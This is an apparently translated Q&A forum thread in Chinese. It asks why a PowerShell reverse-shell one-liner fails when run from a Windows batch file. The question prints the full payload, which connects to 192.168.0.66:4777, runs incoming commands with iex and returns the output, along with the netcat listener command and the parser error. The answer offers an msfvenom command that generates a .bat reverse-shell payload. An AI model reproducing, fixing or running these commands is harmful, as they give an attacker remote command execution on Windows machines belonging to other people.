以批处理文件形式执行 PowerShell

Question

我正在尝试使用.bat文件运行以下反向 shell PowerShell 命令。

powershell /w 1 "$c=new-object system.net.sockets.tcpclient('192.168.0.66',4777);$s=$c.GetStream();[byte[]]$b = 0..65535|%{0};while(($i=$s.Read($b,0,$b.Length)) -ne 0){;$d = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($b,0,$i);$o=(iex $d 2>&1|out-string);$z=$o + 'hacker> ' + (pwd).Path + '> ';$x = ([text.encoding]::ASCII).GetBytes($z);$s.Write($x,0,$x.Length);$s.Flush};$c.close()"

首先，我在 Kali 中启动 netcat 侦听器：

nc -vv -l -p 4777

然后我运行 PowerShell 命令，但在 Windows 10 中出现以下错误：

    At line:1 char:112
    + ... 168.0.66',4777);$s=$c.GetStream();[byte[]]$b = 0..65535|:ASCII).GetByte ...
    +                                                                 ~
    Unexpected token ')' in expression or statement.
    At line:1 char:160
    + ... 65535|:ASCII).GetBytes($z);$s.Write($x,0,$x.Length);$s.Flush};$c.clos ...
    +                                                                 ~
    Unexpected token '}' in expression or statement.
        + CategoryInfo          : ParserError: (:) [], ParentContainsErrorRecordException
        + FullyQualifiedErrorId : UnexpectedToken

我已经尝试了许多可能的' , "和 ``` 组合和变体，无论是在命令中还是在命令中。我完全被难住了。

Answer 1

发现自己遇到了同样的问题。 我想知道为什么在 CMD 中运行而没有错误的命令在 .bat 文件中执行时无法正常工作。 我完全没有道理。

Metasploit 是我们的朋友：

msfvenom -p cmd/windows/reverse_powershell lhost=192.168.1.109 lport=4444 > 1.bat

来源： https : //www.hackingarticles.in/get-reverse-shell-via-windows-one-liner/